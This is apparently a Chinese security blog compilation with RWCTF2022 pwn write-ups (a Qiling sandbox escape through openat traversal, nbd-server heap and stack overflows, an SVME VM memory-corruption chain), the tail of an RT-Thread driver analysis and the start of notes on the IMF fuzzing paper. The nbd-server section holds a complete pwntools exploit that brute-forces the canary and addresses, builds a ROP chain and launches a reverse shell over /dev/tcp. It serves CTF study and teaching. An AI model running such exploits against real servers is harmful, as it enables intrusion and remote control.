可以得出结论：对于编译出来的二进制文件中，存在一个数据段，名为 .rti_fn。这个段上存放着一些函数指针，用于初始化一系列设备等等；而刚刚所说的两个函数指针所表示的是注册在这个段上的两个函数指针，用于标识段上特定类型函数指针的位置。

这里我们可以看到，使用宏 INIT_APP_EXPORT 声明的设备，其函数指针也会存放在 __rt_init_rti_board_end -> __rt_init_rti_end 这个范围。

也就是说使用 INIT_APP_EXPORT 声明的设备，其初始化函数会在 rt_components_init 中执行。

d. smc911_init

接下来我们看看 smc911x 设备驱动，也就是 backdoor 所在的设备驱动（bsp\qemu-vexpress-a9\drivers\drv_smc911x.c）。

可以看到，该文件中存在这样的一条语句：

1	INIT_APP_EXPORT(smc911x_emac_hw_init);

也就是说 smc911x 设备将初始化函数 smc911x_emac_hw_init 注册进了 .rti_fn 段中，等待被函数 rt_components_init 所调用。
而 smc911x_emac_hw_init 函数源码如下：

int smc911x_emac_hw_init(void)
{
    _emac.iobase = VEXPRESS_ETH_BASE;
    // 设置中断号
    _emac.irqno  = IRQ_VEXPRESS_A9_ETH;
    ...
    /* set INT CFG */
    smc911x_reg_write(&_emac, LAN9118_IRQ_CFG, LAN9118_IRQ_CFG_IRQ_POL | LAN9118_IRQ_CFG_IRQ_TYPE);
    ...
#ifdef RT_USING_DEVICE_OPS
    _emac.parent.parent.ops        = &smc911x_emac_ops;
#else
    _emac.parent.parent.init       = smc911x_emac_init;
    _emac.parent.parent.open       = RT_NULL;
    _emac.parent.parent.close      = RT_NULL;
    _emac.parent.parent.read       = RT_NULL;
    _emac.parent.parent.write      = RT_NULL;
    _emac.parent.parent.control    = smc911x_emac_control;
#endif
    _emac.parent.parent.user_data  = RT_NULL;
    // 注意! 这里设置了 eth_rx 和 eth_tx 方法
    _emac.parent.eth_rx     = smc911x_emac_rx;
    _emac.parent.eth_tx     = smc911x_emac_tx;

    /* register ETH device */
    // 对 eth device 进行初始化
    eth_device_init(&(_emac.parent), "e0");
    ...
}

该函数主要设置了一些操作（ops），例如 smc911x_emac_init、smc911x_emac_rx、smc911x_emac_tx。我们可以看到该函数为结构体 _emac 设置了 eth_rx 和 eth_tx 字段，因此当 lwIP 线程需要收发信息时，会调用该设备的 smc911x_emac_rx、smc911x_emac_tx 这两个函数。

这里比较有意思的是结构体 _emac 的类继承关系：

struct eth_device_smc911x
{
    /* inherit from Ethernet device */
    struct eth_device parent;
    /* interface address info. */
    rt_uint8_t enetaddr[MAX_ADDR_LEN];         /* MAC address  */

    uint32_t iobase;
    uint32_t irqno;
};

这里存在一个 parent 结构体，类似于 C++ 中的继承，表示了一个具体的以太网设备。而该 eth_device 结构体源码如下：

struct eth_device
{
    /* inherit from rt_device */
    struct rt_device parent;

    /* network interface for lwip */
    struct netif *netif;
    struct rt_semaphore tx_ack;

    rt_uint16_t flags;
    rt_uint8_t  link_changed;
    rt_uint8_t  link_status;
    rt_uint8_t  rx_notice;

    /* eth device interface */
    struct pbuf* (*eth_rx)(rt_device_t dev);
    rt_err_t (*eth_tx)(rt_device_t dev, struct pbuf* p);
};

#ifdef __cplusplus
extern "C" {
#endif

    rt_err_t eth_device_ready(struct eth_device* dev);
    rt_err_t eth_device_init(struct eth_device * dev, const char *name);
    rt_err_t eth_device_init_with_flag(struct eth_device *dev, const char *name, rt_uint16_t flag);
    rt_err_t eth_device_linkchange(struct eth_device* dev, rt_bool_t up);

    int eth_system_device_init(void);

#ifdef __cplusplus
}

这个结构体描述了一个抽象的以太网设备接口，其中这些函数指针在 lwIP 层会被调用。

注意到最后 smc911x_emac_hw_init 函数执行了一下 eth_device_init 函数，而该函数最终会调用到 smc911x_emac_init 函数，在其中注册中断处理例程 smc911x_isr：

1	rt_hw_interrupt_install(emac->irqno, smc911x_isr, emac, "smc911x");

当以太网设备有数据发出中断后，中断处理例程 smc911x_isr 被调用，如果数据准备好了，则调用 eth_device_ready：

static void smc911x_isr(int vector, void *param)
{
    uint32_t status;
    struct eth_device_smc911x *emac;

    emac = SMC911X_EMAC_DEVICE(param);

    status = smc911x_reg_read(emac, LAN9118_INT_STS);

    if (status & LAN9118_INT_STS_RSFL)
    {
        eth_device_ready(&emac->parent);
    }
    smc911x_reg_write(emac, LAN9118_INT_STS, status);

    return ;
}

而 eth_device_ready 函数会发送邮件给 erx 线程：

rt_err_t eth_device_ready(struct eth_device* dev)
{
    if (dev->netif)
    {
        if(dev->rx_notice == RT_FALSE)
        {
            dev->rx_notice = RT_TRUE;
            // 发送邮件给 erx 线程
            return rt_mb_send(ð_rx_thread_mb, (rt_ubase_t)dev);
        }
        else
            return RT_EOK;
        /* post message to Ethernet thread */
    }
    else
        return -RT_ERROR; /* netif is not initialized yet, just return. */
}

这样，整个流程就全部出来了，正对上了最上面的那个流程图。

八、参考

九、鸣谢

特别感谢呆呆师傅的 FLAG 题解技术分享。

RWCTF2022 Pwn 笔记1

2022-01-24T16:00:00.000Z

一、简介

这里是复盘 RWCTF2022 关于:

QLaas
Who Moved My Block
SVME

这三道题时所写下的一些笔记。

受限于时间与效率，一部分题目的 exp 将不再贴出，只会记录下解题或利用的详细流程。

二、QLaas

1. QLaas 小叙

Qiling as a Service.
nc 47.242.149.197 7600
QLaaS_61a8e641694e10ce360554241bdda977.tar.gz
Note: read flag using /readflag

Clone-and-Pwn, difficulty:Schrödinger

该题只给了一个这样的脚本，用于读取用户传来的文件并将其放入麒麟沙箱（rootfs 为一个临时文件夹）：

#!/usr/bin/env python3

import os
import sys
import base64
import tempfile
# pip install qiling==1.4.1
from qiling import Qiling

def my_sandbox(path, rootfs):
    ql = Qiling([path], rootfs)
    ql.run()

def main():
    sys.stdout.write('Your Binary(base64):\n')
    line = sys.stdin.readline()
    binary = base64.b64decode(line.strip())
    
    with tempfile.TemporaryDirectory() as tmp_dir:
        fp = os.path.join(tmp_dir, 'bin')

        with open(fp, 'wb') as f:
            f.write(binary)

        my_sandbox(fp, tmp_dir)

if __name__ == '__main__':
    main()

题目要求：执行 /readflag 来获取 flag（注意不是直接读取 /flag）

2. qiling 框架环境配置

# 下拉麒麟框架
git clone git@github.com:qilingframework/qiling.git
cd qiling
# 在麒麟框架代码中放入题目附件
nano main.py
# 创建自己的 exp
touch exp.cpp

# 装个 PyCharm （别用 VSCode 调试）

3. 漏洞点

unicorn 框架是 qiling 框架的核心，qiling 还在该基础之上额外实现了很多功能，包括与 OS 的一些交互操作等等。qiling 自己实现了一系列 syscall 调用，并让沙箱程序通过这些 qiling syscall 来间接与 OS 进行交互。

但倘若这些 qiling syscall 内部存在缺陷，那么沙箱程序便可以通过这些 syscall 进行沙箱逃逸。

qiling 默认会在执行沙箱程序时，将沙箱程序内部调用的 syscall 日志输出：

这样，通过字符串搜索 + 动态调试并结合信息搜索，我们可以得出这些 syscall in posix 的实现是位于 qiling/qiling/os/posix/syscall/ 文件夹下。接下来便是代码审计 + 调试了。

通过 ~~被大佬带飞~~ 审计与调试，我们可以发现在 ql_syscall_openat 函数中存在目录穿越漏洞。为了说明这个目录穿越，我们先简单的使用 open 函数来写个程序跑跑看看 qiling 的逻辑:

#include 
#include 
#include 
#include 
#include 

using namespace std;

int main() {
    int fd = open("../../../../../../../../proc/self/", O_RDONLY, 0);

    return 0;
}

如上图，实际所调用的 syscall 不是 SYS_open，而是 SYS_openat。

当调用 ql_syscall_openat时，实际进行文件打开的操作位于函数 ql.os.fs_mapper.open_ql_file：

def ql_syscall_openat(ql: Qiling, fd: int, path: int, flags: int, mode: int):
    file_path = ql.os.utils.read_cstring(path)
    # real_path = ql.os.path.transform_to_real_path(path)
    # relative_path = ql.os.path.transform_to_relative_path(path)

    flags &= 0xffffffff
    mode &= 0xffffffff

    idx = next((i for i in range(NR_OPEN) if ql.os.fd[i] == 0), -1)

    if idx == -1:
        regreturn = -EMFILE
    else:
        try:
            if ql.archtype== QL_ARCH.ARM:
                mode = 0

            flags = ql_open_flag_mapping(ql, flags)
            fd = ql.unpacks(ql.pack(fd))

            if 0 <= fd < NR_OPEN:
                dir_fd = ql.os.fd[fd].fileno()
            else:
                dir_fd = None

            # 注意：在这里打开实际的文件，并将打开的文件描述符放入 fd array 中
            ql.os.fd[idx] = ql.os.fs_mapper.open_ql_file(file_path, flags, mode, dir_fd)

            regreturn = idx
        except QlSyscallError as e:
            regreturn = -e.errno
            
    ql.log.debug(f'openat(fd = {fd:d}, path = {file_path}, mode = {mode:#o}) = {regreturn:d}')

    return regreturn

继续读读 ql.os.fs_mapper.open_ql_file 函数源码。由于我们是尝试打开正常的文件，因此走下面 else 分支：

def open_ql_file(self, path, openflags, openmode, dir_fd=None):
    if self.has_mapping(path):
        self.ql.log.info(f"mapping {path}")
        return self._open_mapping_ql_file(path, openflags, openmode)
    else:
        # 进入该分支
        if dir_fd:
            return ql_file.open(path, openflags, openmode, dir_fd=dir_fd)

        real_path = self.ql.os.path.transform_to_real_path(path)
        return ql_file.open(real_path, openflags, openmode)

如果不存在 dir_fd，则调用 transform_to_real_path 函数将传入的 path 转换为真正的 path，即绝对路径。而调用 transform_to_real_path 处理 path 的调用链如下所示：

convert_for_native_os, path.py:106
convert_path, path.py:114
transform_to_real_path, path.py:131
open_ql_file, mapper.py:106
ql_syscall_openat, fcntl.py:108
[....]

最终，qiling 会在 convert_for_native_os 函数中，过滤掉无效的目录穿越路径。

@staticmethod
def convert_for_native_os(rootfs: Union[str, Path], cwd: str, path: str) -> Path:
    _rootfs = Path(rootfs)          # _rootfs : /tmp/tmpldhylv0h
    _cwd = PurePosixPath(cwd[1:])   # _cwd : .
    _path = Path(path)              # _path : ../../../../../../../../proc/self

    if _path.is_absolute():
        return _rootfs / QlPathManager.normalize(_path)
    else:
        # 走该分支，返回 /tmp/tmpldhylv0h/proc/self
        return _rootfs / QlPathManager.normalize(_cwd / _path.as_posix())

之后在上面的 open_ql_file 函数中，调用 ql_file.open 函数来与 OS 交互，而该函数是没有任何路径过滤的：

@classmethod
def open(cls, open_path: AnyStr, open_flags: int, open_mode: int, dir_fd: int = None):
    open_mode &= 0x7fffffff

    try:
        # 传入进来的路径直接与 OS 交互，无任何过滤
        fd = os.open(open_path, open_flags, open_mode, dir_fd=dir_fd)
    except OSError as e:
        raise QlSyscallError(e.errno, e.args[1] + ' : ' + e.filename)

    return cls(open_path, fd)

这样看来，qiling openat syscall 没法路径穿越？非也。注意到 open_ql_file 函数中的这句代码：

def open_ql_file(self, path, openflags, openmode, dir_fd=None):
    if self.has_mapping(path):
        self.ql.log.info(f"mapping {path}")
        return self._open_mapping_ql_file(path, openflags, openmode)
    else:
        # 如果存在 dir fd
        if dir_fd:
            # 则 path 将直接与 OS 进行交互，没有经过任何过滤
            return ql_file.open(path, openflags, openmode, dir_fd=dir_fd)

        real_path = self.ql.os.path.transform_to_real_path(path)
        return ql_file.open(real_path, openflags, openmode)

因此如果我们在调用 qiling openat syscall 时传入一个恶意的目录穿透路径，那就可以进行目录穿透攻击！

动手试一试：

#include 
#include 
#include 
#include 
#include 

using namespace std;

int main() {
    int root_fd = open("/", O_RDONLY);
    int mem_fd = openat(root_fd, "../../../../proc/self/mem", O_RDWR, 0);

    return 0;
}

可以发现两个 SYS_openat 均执行成功，可以达到目录穿越的效果：

目录穿越后，我们便可以尝试读写任意文件。

注意到 flag 只能通过执行 /readflag 来获取，因此我们可以尝试对 /proc/self/mem 进行读写。

该文件是进程的内存内容，修改该文件等同于直接修改该进程的虚拟地址空间，我们可以试着将自己的 shellcode 放入代码段中并执行。

需要注意的是，该文件不能直接读取，需要结合 /proc/self/maps 的映射信息来确定读的偏移值。即无法读取未被映射的区域。

4. 利用流程

利用流程如下：

第一次执行：读取 /proc/self/exe，将远程机器上的 python 二进制文件 dump 到本地，获取其 GOT 表的相对偏移位置。
第二次执行：读取 /proc/self/maps：
- 获取远程机器 python 程序的基地址，加上 GOT 相对偏移得到 GOT 表的绝对地址。
- 获取远程机器上 python 程序的可执行代码段地址，将 shellcode 写入可执行代码段中。
- 修改 GOT 表上的条目入口为 shellcode ，之后尝试触发所被修改 GOT 表的函数，使 python 执行 shellcode。

这题利用较为简单，exp 鸽了。

三、Who Moved My Block

1. wmmb 小叙

On Linux, network block device (NBD) is a network protocol that can be used to forward a block device (typically a hard disk or partition) from one machine to a second machine. As an example, a local machine can access a hard disk drive that is attached to another computer.
https://github.com/NetworkBlockDevice/nbd
nc 47.242.113.232 31337
attachment

Clone-and-Pwn, difficulty:baby

2. wmmb 环境搭建

查看题目提供的二进制开启的保护（好家伙，真就全开）：

下拉源码编译，

wget https://versaweb.dl.sourceforge.net/project/nbd/nbd/3.23/nbd-3.23.tar.gz
tar -xvf nbd-3.23.tar.gz
cd nbd-3.23
./configure --enable-debug
# 编译时启用 Full RELRO、Canary、NX 和 PIE
make "CFLAGS += -fstack-protector-all -pie -z now -z noexecstack"
# make install

./nbd-server 0.0.0.0:10809 ${PWD}/../WhoMovedMyBlock/container/rootfs.ext2
# 注意，直接执行 nbd-server 会在输出信息后，**前台进程** 立即转为后台进程，移交控制权给 shell
# 该进程仍然在后台执行，可以使用以下命令探查到
ps -ax | grep "nbd"

调试时，如果不希望让该进程转为后台进程，则 make 时添加 flag：make "CFLAGS += -DNODAEMON"

3. 漏洞点

a. 漏洞寻找

远程机器上会架起一个 nbd-server，很明显我们需要向这个 nbd-server 发起一个连接，并尝试在发送的 payload 中构造一些恶意的字段。

那么我们就需要尝试去审计代码（代码位于 nbd-3.23/nbd-server.c），找到一条不受信任输入 -> 无过滤 -> 访问内存这样的一条途径。

那就首先从 accept 函数开始找起，它是整个 socket 连接的起点，通过它我们可以根据交叉引用找到处理连接的函数 handle_modern_connection：

static void
handle_modern_connection(GArray *const servers, const int sock, struct generic_conf *genconf)
{
    [...]
    net = socket_accept(sock);
    if (net < 0)
        return;
    
    if (!dontfork) {
        // 重要！：注意这里会 fork 出一个子进程来单独处理新连接
        pid = spawn_child(&commsocket);
        if (pid) {
            if (pid > 0) {
                msg(LOG_INFO, "Spawned a child process");
                g_array_append_val(childsocks, commsocket);
            }
            if (pid < 0)
                msg(LOG_ERR, "Failed to spawn a child process");
            close(net);
            return;
        }
        /* Child just continues. */
    }
    [...]
    
    // 连接协商
    client = negotiate(net, servers, genconf);
       
    [...]
       
    msg(LOG_INFO, "Starting to serve");

    // 开始处理
    mainloop_threaded(client);
    exit(EXIT_SUCCESS);
handler_err:
    [...]
}

需要注意的是，默认情况下对于每个连接，server 都会 fork 一个新的子进程来单独处理。这个特性相当重要，因为我们可以利用这个特性来爆破 canary 和 PIE。

该函数会调用 negotiate 函数，并创建结构体 CLIENT，将新连接的 fd 赋给该 client，之后后续使用 socket_read(client, addr, len) 来从 client（即我们这边）读取数据。

/**
 * Do the initial negotiation.
 *
 * @param net The socket we're doing the negotiation over.
 * @param servers The array of known servers.
 * @param genconf the global options (needed for accessing TLS config data)
 **/
CLIENT* negotiate(int net, GArray* servers, struct generic_conf *genconf) {
    uint16_t smallflags = NBD_FLAG_FIXED_NEWSTYLE | NBD_FLAG_NO_ZEROES;
    uint64_t magic;
    uint32_t cflags = 0;
    uint32_t opt;
    // 创建并初始化 client 结构体
    CLIENT* client = g_new0(CLIENT, 1);
    // 将 socket fd 赋给 cleint
    client->net = net;
    client->socket_read = socket_read_notls;
    client->socket_write = socket_write_notls;
    client->socket_closed = socket_closed_negotiate;

    assert(servers != NULL);
    socket_write(client, INIT_PASSWD, 8);
    magic = htonll(opts_magic);
    socket_write(client, &magic, sizeof(magic));

    smallflags = htons(smallflags);
    socket_write(client, &smallflags, sizeof(uint16_t));
    // 从 client 读取数据
    socket_read(client, &cflags, sizeof(cflags));
    cflags = htonl(cflags);
    [...]
}

这样，我们可以全局搜索 socket_read的使用并对其进行审计。该函数使用的次数不多，只有不到 20次，因此人工审计还是很快的。通过审计可以找到3个漏洞点。

注意，审计时忽略了 TLS 相关的函数，因为远程不启用 TLS 交互。

b. 漏洞

0) codeql

author: sakura.

顺手写了一下codeql的数据流分析，这里考虑两种简单写法，一种是将网络端序转换的函数例如htol作为source，然后socket_read作为sink点检查size溢出。

另一种是将socket_read的第二个参数，这个接收用户输入的地方作为source点，然后将看能否污点到binary operation或者污点到source_read的第三个参数。

这里写了下后者的QL。

在写codeql的时候注意到QL的数据流分析其实是比较保守的，所以需要自己去连接一些边。

/**
 * @kind path-problem
 */

import DataFlow::PathGraph
import cpp
import semmle.code.cpp.ir.dataflow.TaintTracking

predicate htonlCallEdge(DataFlow::Node node1, DataFlow::Node node2) {
  exists(FunctionCall fc |
    // fc.getTarget().getName() = "htonl" and
    node1.asExpr() = fc.getAnArgument() and
    node2.asExpr() = fc
  )
}

class MyDataFlowConfiguration extends TaintTracking::Configuration {
  MyDataFlowConfiguration() { this = "MyDataFlowConfiguration" }

  override predicate isSource(DataFlow::Node source) {
    exists(FunctionCall fc | fc.getArgument(1) = source.asExpr() |
      fc.getTarget().hasGlobalName("socket_read")
    )
  }

  override predicate isSink(DataFlow::Node sink) {
    sink.asExpr().getLocation().toString().matches("%nbd-server%") and
    sink.asExpr() instanceof BinaryArithmeticOperation
    // exists(FunctionCall fc | fc.getArgument(2) = sink.asExpr() |
    //   fc.getTarget().hasGlobalName("socket_read")
    // )
  }

  override predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) {
    htonlCallEdge(node1, node2)
  }
}

from MyDataFlowConfiguration config, DataFlow::PathNode source, DataFlow::PathNode sink
where config.hasFlowPath(source, sink)
select sink.getNode(), source, sink, ""

1) handle_export_name

一个整数溢出所造成的堆溢出漏洞点位于 handle_export_name 函数中：

可以造成任意长度的堆溢出。

static CLIENT* handle_export_name(CLIENT* client, uint32_t opt, GArray* servers, uint32_t cflags) {
    uint32_t namelen;
    char* name;
    int i;
    // 从 client 读入 namelen
    socket_read(client, &namelen, sizeof(namelen));
    namelen = ntohl(namelen);
    if(namelen > 0) {
        // 这里没有做整数溢出判断，因此如果 namelen 为 0xffffffff，那么实际 malloc 的 size 为 0
        // 因此这里会造成堆溢出
        name = malloc(namelen+1);
        name[namelen]=0;
        socket_read(client, name, namelen);
    } else {
        name = strdup("");
    }
    [...]
}

2) handle_info

该函数中有两个漏洞点，其中一个还是和上面类似的堆溢出：

还是可以造成任意长度的堆溢出。

static bool handle_info(CLIENT* client, uint32_t opt, GArray* servers, uint32_t cflags) {
    uint32_t namelen, len;
    char *name;
    int i;
    SERVER *server = NULL;
    [...]
    char buf[1024];
    [...]

    socket_read(client, &len, sizeof(len));
    len = htonl(len);
    // 1. 从远程读入 namelen
    socket_read(client, &namelen, sizeof(namelen));
    namelen = htonl(namelen);
    if(namelen > (len - 6)) {
        send_reply(client, opt, NBD_REP_ERR_INVALID, -1, "An OPT_INFO request cannot be smaller than the length of the name + 6");
        socket_read(client, buf, len - sizeof(namelen));
    }
    if(namelen > 0) {
        // 2. 没有判断便直接加1，执行 malloc(0) 造成堆溢出
        name = malloc(namelen + 1);
        // *. 缺点，需要做风水绕过 0xffffffff 的越界写，因为这里可能会造成 SIGSEGV。
        name[namelen] = 0;
        socket_read(client, name, namelen);
    } else {
        name = strdup("");
    }
    [...]
}

还有一个是溢出长度不受限的栈溢出：

static bool handle_info(CLIENT* client, uint32_t opt, GArray* servers, uint32_t cflags) {
    uint32_t namelen, len;
    char *name;
    int i;
    SERVER *server = NULL;
    [...]
    char buf[1024];
    [...]

    // 1. 从远程读入 len
    socket_read(client, &len, sizeof(len));
    len = htonl(len);
    // 2. 从远程读入 namelen
    socket_read(client, &namelen, sizeof(namelen));
    namelen = htonl(namelen);
    // 3. 进入 if 分支
    if(namelen > (len - 6)) {
        send_reply(client, opt, NBD_REP_ERR_INVALID, -1, "An OPT_INFO request cannot be smaller than the length of the name + 6");
        // 4. 从 client 读入数据，由于 len 可控，因此可以造成栈溢出
        socket_read(client, buf, len - sizeof(namelen));
    }
    if(namelen > 0) {
        name = malloc(namelen + 1);
        name[namelen] = 0;
        socket_read(client, name, namelen);
    } else {
        name = strdup("");
    }
    [...]
}

4. 利用流程

首先，连接远程，并手动构造恶意数据字段，触发栈溢出，爆破出 Canary 和 PIE，进而计算出$addr_{ELF-base}、addr_{GOT}、addr_{system}、addr_{gadgets}$等等。
leak 出这些后，我们需要将待执行的 cmd 传递给 system 函数。但我们发来的所有数据都存储在 heap 中，cmd 自然也不例外，因此我们还需要 leak 出堆地址。
注意到 handle_info 函数栈上存放了一个 old r12 数据，指向 client，我们可以试着爆破这个栈上数据来获取堆地址。
需要注意的是，连接远程时是使用 socket 进行通信，因此 cmd 不能是直接的 cat /flag，必须将所执行命令的 stdout 导入到我们连接的 socket fd 上。
最简单的方式就是反弹 shell至我们的主机上。
最后使用 ROP 一把梭。

5. Exploit

这题 exploit 有点意思，所以本人试着自己动手写了下：

注意，exp 中的偏移量等使用的是自编译的 nbd-server。
由于本人根据远程的保护，在编译时对等开启了相应的保护，因此实际上编译出的 nbd-server 和远程的 binary，其内部偏移几乎无差别，因此该 exp 只需简单改改部分偏移量即可解远程 binary。

#! python3
from pwn import *
context(
    terminal=['gnome-terminal', '-x', 'bash', '-c'],
    os='linux',
    arch='amd64',
    encoding='latin',
    endian="little",       # 注意：网络端序是大端序
    log_level="info",
)

'''
stack layout:

- 0x400 bytes buf
- 8 bytes unknown field
- canary
- 8 bytes unknown field
- old_rbx
- old_rbp
- old_r12 : client_addr
- old_r13
- old_r14
- old_r15
- return addr
'''

def send_new_request(payload):
    p = remote("127.0.0.1", 10809)
    cmd = b' '*0x25 + b"sleep 5; bash -c \"bash -i >& /dev/tcp/127.0.0.1/8001 0>&1\""
    
    p.send(p32(0, endian="big"))                  # cflags
    p.send(b"IHAVEOPT")                           # opt_magic
    p.send(p32(7, endian="big"))                  # opt: NBD_OPT_GO
    p.send(p32(len(payload) + 4, endian="big"))   # len

    namelen = len(payload)
    p.send(p32(namelen, endian="big"))            # namelen (> (len - 6))
    
    p.send(payload)                               # payload

    padding_len = namelen - len(cmd)
    assert padding_len >= 0
    p.send(cmd + b'\x00'*padding_len)             # name 指针，用于存放执行 system 函数的命令参数

    p.send(p16(0, endian="big"))                  # n_requests

    return p

def exploit_stack_data(payload, target_len=8):
    data = b""
    while len(data) < target_len:
        for ch in range(256):
            p = send_new_request(payload + data + p8(ch))
            p.clean()

            log.info("Getting stack mem: " + \
                hex(int.from_bytes(data,byteorder='little')) + \
                ", ch: " + str(ch))
            try:
                p.recv(timeout=1)
                p.close()
                data += p8(ch)
                break
            except EOFError:
                p.close()
            
    return data
    
if __name__ == '__main__':
    b2i = lambda addr : int.from_bytes(addr,byteorder='little')

    if True:
        canary = p64(0x5af9ebae046ded00)
        client_addr = p64(0x555cbd36c9b0)
        ret_addr = p64(0x555cbbb901b7)
    else:
        canary = None
        client_addr = None
        ret_addr = p8(0xb7) # 手动指定最后一个字节，提高爆破精度
    ret_addr_offset = 0x91B7

    if canary is None:
        canary = exploit_stack_data(b'a'*0x408, target_len=8)
        log.info("=================================")
        log.success("canary: " + hex(b2i(canary)))
        input()

    if client_addr is None:
        client_addr = exploit_stack_data(b'a'*0x408 + canary + b'b'*0x18, target_len=8)
        log.info("=================================")
        log.success("client addr: " + hex(b2i(client_addr)))
        input()

    if len(ret_addr) < 8:
        ret_addr += exploit_stack_data(
            b'a'*0x408 + canary + b'b'*0x18 + client_addr + b'c'*0x18 + ret_addr, target_len=7)
        log.info("=================================")
        log.success("ret addr: " + hex(b2i(ret_addr)))
        input()

    elf = ELF("./nbd-server")
    elf.address = b2i(ret_addr) - ret_addr_offset
    log.success("ELF base addr: " + hex(elf.address))
    assert elf.address & 0xfff == 0

    elf_rop = ROP(elf)
    elf_rop.system(b2i(client_addr) + 0x180)
    print(elf_rop.dump())

    log.info("Try getting reverse shell")
    p = send_new_request(b'a'*0x408 + canary + b'b'*0x18 + client_addr + b'c'*0x18 + elf_rop.chain())
    p.interactive()

坑点主要在于爆破。整个 exp 中爆破是重中之重，但在低地址字节处的爆破容易产生误报，因此最好多爆破几次。需要爆破的数据主要有以下三点：

canary 爆破：错1个字节就直接 abort，这在爆破上是件好事，最容易爆破的数据。
ret address 爆破：需要手动指定最低地址的那个字节，以提高爆破精度。低地址 1 字节的值可以通过 IDA 得知（注意页对齐大小为 0x1000）。
client address 爆破：由于调用 handle_info 函数时，调用者会将 client 的地址压入栈上（old r12)，因此在离开 handle_info 之前，需要执行pop r12指令。我们可以尝试对该 r12 进行爆破，以获取到 client 地址，并根据相对偏移获取存储 system 命令的 name 内存地址。
注意点
- 由于程序中较多使用 socket_read 函数，该函数会使用到 client 上的函数指针，因此 client 地址哪怕偏移一个字节都会造成 SIGSEGV，这在爆破上是一件好事。
- 但是在实际爆破过程中，client addr 是比较容易误报的，需要仔细甄别。

四、SVME

1. SVME 小叙

Professor Terence Parr has taught us how to build a virtual machine. Now it's time to break it!
nc 47.243.140.252 1337
attachment

Clone-and-Pwn, Virtual Machine, difficulty:baby

一个简易的开源 VM，baby 难度。

2. SVME 环境搭建

题目给了一个 libc-2.31.so 附件和 main.c ：

#include 
#include 
#include "vm.h"

int main(int argc, char *argv[]) {
    int code[128], nread = 0;
    while (nread < sizeof(code)) {
        int ret = read(0, code+nread, sizeof(code)-nread);
        if (ret <= 0) break;
        nread += ret;
    }
    VM *vm = vm_create(code, nread/4, 0);
    vm_exec(vm, 0, true);
    vm_free(vm);
    return 0;
}

执行以下命令配置环境：

git clone git@github.com:parrt/simple-virtual-machine-C.git
cp ./main.c /simple-virtual-machine-C-master/src/vmtest.c
cd simple-virtual-machine-C-master
cmake .
make

3. 漏洞点

首先，我们可以在 #L40 看到 VM 结构体的布局：

typedef struct {
    int returnip;
    int locals[DEFAULT_NUM_LOCALS];
} Context;

typedef struct {
    int *code;
    int code_size;

    // global variable space
    int *globals;
    int nglobals;

    // Operand stack, grows upwards
    int stack[DEFAULT_STACK_SIZE];
    Context call_stack[DEFAULT_CALL_STACK_SIZE];
} VM;

根据 main.c 的代码，可以得知创建出的 VM 结构体，其 code 字段指向栈，globals 字段指向堆。

而在 opcode LOAD 和 STORE 的处理中，我们可以看到，这里可以 相对 VM 结构体（注意结构体在堆中） 偏移任意字节进行读写。

case LOAD: // load local or arg
    offset = vm->code[ip++];
    vm->stack[++sp] = vm->call_stack[callsp].locals[offset];
    break;
[...]
case STORE:
    offset = vm->code[ip++];
    vm->call_stack[callsp].locals[offset] = vm->stack[sp--];
    break;

同时，opcode GLOAD 和 GSTORE 可以让我们相对 globals 指针所指向的内存偏移任意字节进行读写。

case GLOAD: // load from global memory
    addr = vm->code[ip++];
    vm->stack[++sp] = vm->globals[addr];
    break;
case GSTORE:
    addr = vm->code[ip++];
    vm->globals[addr] = vm->stack[sp--];
    break;

这样，我们便可以利用这些 opcode 来泄露指针并任意读写内存，进而修改 libc 上的 free hook，在 VM 退出时劫持控制流。

4. 利用流程

使用 STORE，让 VM->stack 向低地址处移动，读取 globals 和 code 的指针值，并保存 vm->call_stack 上，之后恢复 VM->stack。
恢复时需要覆写 globals 和 code 指针，注意需要覆写正确。
使用任意地址读，读取栈上的 libc_start_main return address，计算出 libc base、free_hook 和 one_gadget addr。
使用任意地址写，修改 free_hook 上的地址条目为 one_gadget，劫持控制流获取 shell。

这题利用较为简单，exp 鸽了。

《IMF：Inferred Model-based Fuzzer》论文笔记

2022-01-19T16:00:00.000Z

一、简介

内核 API 函数之间的调用大多是相互依赖的，即一些 API 的调用需要依赖其他 API 调用所产生的上下文，因此若给定的调用上下文无用，则内核 API 将会始终执行失败，无法进入到更深层次的逻辑中。
这篇论文提出了一种新的内核 fuzz 方式，它利用内核 API 函数之间的依赖（即 API 调用序列的相似性），来推断出依赖模型，进而利用该模型生成出随机并且结构性良好的 API 序列，进行更深层次的 fuzz。
其中，API 调用的依赖关系包含两种，分别是
1. 顺序依赖，即 A 函数应该比 B 函数更早被调用。
2. 数据依赖，函数调用之间存在着数据流传递。
Fuzz 的主要目标是 IOKit Lib。
IMF src - github

需要注意的是，这篇论文是 17 年的论文，实验时所使用的 MacOS 版本为 10.12.3，而本人的机器版本为 MacOS 12.0.1，因此在复现实验是会存在一些困难。

二、架构

该论文所提出的 IMF 架构图如下所示：

其中， IMF 共有三部分组成，分别是

Logger：用于记录指定应用程序的 API 调用日志。调用日志中包括了调用函数名，调用传入的参数值等等数据。
Inferrer：从 Logger 生成的 API log 中推断出顺序依赖和数据依赖。初始时 Inferrer 会在 Logger 生成的 L 条 log 中，筛选出最大前缀长度的 N (N < L) 个日志；之后这 N 个日志将用于推断依赖关系，生成 API 依赖模型。
Fuzzer：使用推断出的 API 依赖模型动态生成出 testcase 并用于测试。

三、例子

论文中给了一个 fuzz 过程的示例。通过这个示例我们可以简单了解一下整个 IMF 的处理过程。

1. 初始

初始时，给定一系列配置文件和 API 函数原型注释文件，其中后者存放着目标 IOKit API 的函数名称、参数类型与个数等等的信息，通常以 JSON 格式保存。

API 函数原型注释文件，主要用于生成 API hook 以及为 API 依赖关系推断。

2. 安装 API hook

开始时，IMF 为目标程序 2048 Game 安装 API hook，这样当目标程序调用 IOKit Lib 时，这些函数调用将会被 hook 并被记录下来。
之后模拟鼠标输入或键盘输入，为目标程序提供输入，这样目标程序就会调用 IOKit 并留下 API Log。
尝试循环执行目标程序 L=1000 次并记录下 L 个日志。

需要注意的是，本人实际复现实验时，可能是受限于 MacOS 版本问题，hook 2048 Game 无法记录下任何 IOKit Log（但是 VSCode 可以，但是日志数量较少）。
因此本人在实验时，所选定的目标程序为 /usr/sbin/ioreg。

每一次的日志中都会记录下调用 API 时的 1) 输入参数的类型与值；2) 返回值的类型与值。

3. 过滤 API log

直到目前，API hook 已经记录下了 L=1000 个日志，那么接下来就需要对其进行筛选，从中筛出 log 的子集。

